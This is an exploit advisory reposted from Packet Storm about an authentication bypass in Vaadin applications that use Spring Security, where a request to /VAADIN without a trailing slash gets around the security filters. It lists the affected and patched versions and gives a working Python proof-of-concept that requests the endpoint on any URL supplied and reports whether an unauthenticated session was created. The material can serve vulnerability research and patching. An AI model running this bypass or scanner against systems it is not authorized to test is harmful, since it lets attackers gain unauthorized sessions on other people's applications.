Share
## https://sploitus.com/exploit?id=PACKETSTORM:218596
==================================================================================================================================
    | # Title     : Vaadin 25.x Authentication Bypass                                                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://vaadin.com/                                                                                              |
    ==================================================================================================================================
    
    [+] Summary    : This vulnerability affects multiple versions of Vaadin ( 6.8.13 ,14.x, 23.x, 24.x, and 25.x) when used with Spring Security, due to inconsistent path pattern matching on reserved framework routes.
                     Accessing the /VAADIN endpoint without a trailing slash can bypass security filters, allowing unauthenticated users to trigger framework initialization and create valid sessions without proper authorization. 
    				 
    [+]  It was successfully tested on : 6.8.13			 
    
    [+] This impacts Vaadin versions:
    
    14.0.0 โ€“ 14.14.0 โ†’ fixed in 14.14.1
    23.0.0 โ€“ 23.6.6 โ†’ fixed in 23.6.7
    24.0.0 โ€“ 24.9.7 โ†’ fixed in 24.9.8
    25.0.0 โ€“ 25.0.1 โ†’ fixed in 25.0.2+
    
    [+] Older unsupported branches (10โ€“13 and 15โ€“22) are also affected and require upgrading to supported releases.
    
    [+] A Python proof-of-concept scanner demonstrates the issue by requesting the /VAADIN endpoint and checking for signs of session creation. 
        If the server returns HTTP 200 along with a JSESSIONID cookie, the application is flagged as potentially vulnerable. 
    	Otherwise, responses like 401 or 302 suggest that authentication protections are still active.
    
    [+] POC   :  
    
    
    import requests
    import sys
    
    def check_vaadin_auth_bypass(url):
        """
        Checks if a Vaadin application is vulnerable 
        by accessing the /VAADIN endpoint without a trailing slash.
        """
        target_url = url.rstrip('/') + '/VAADIN'
        headers = {
            'User-Agent': 'indoushka-Scanner'
        }
        
        try:
            print(f"[*] Checking {target_url}")
            response = requests.get(target_url, headers=headers, allow_redirects=False, timeout=10)
            
            if response.status_code == 200 and 'JSESSIONID' in response.cookies:
                print(f"[!] VULNERABLE: Authentication bypass succeeded on {target_url}")
                print(f"[!] New session created: {response.cookies.get('JSESSIONID', 'Not Found')}")
                return True
            elif response.status_code == 200:
                print(f"[-] Got HTTP 200 but no new JSESSIONID cookie. Might not be vulnerable or already patched.")
            elif response.status_code == 401 or response.status_code == 302:
                print(f"[-] Not vulnerable. Received HTTP {response.status_code} (authentication required or redirect).")
            else:
                print(f"[-] Unexpected response: HTTP {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[ERROR] Could not connect to {target_url}: {e}")
        
        return False
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print("Usage: python poc.py <target_base_url>")
            print("Example: python poc.py https://example.com")
            sys.exit(1)
            
        target = sys.argv[1]
        check_vaadin_auth_bypass(target)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================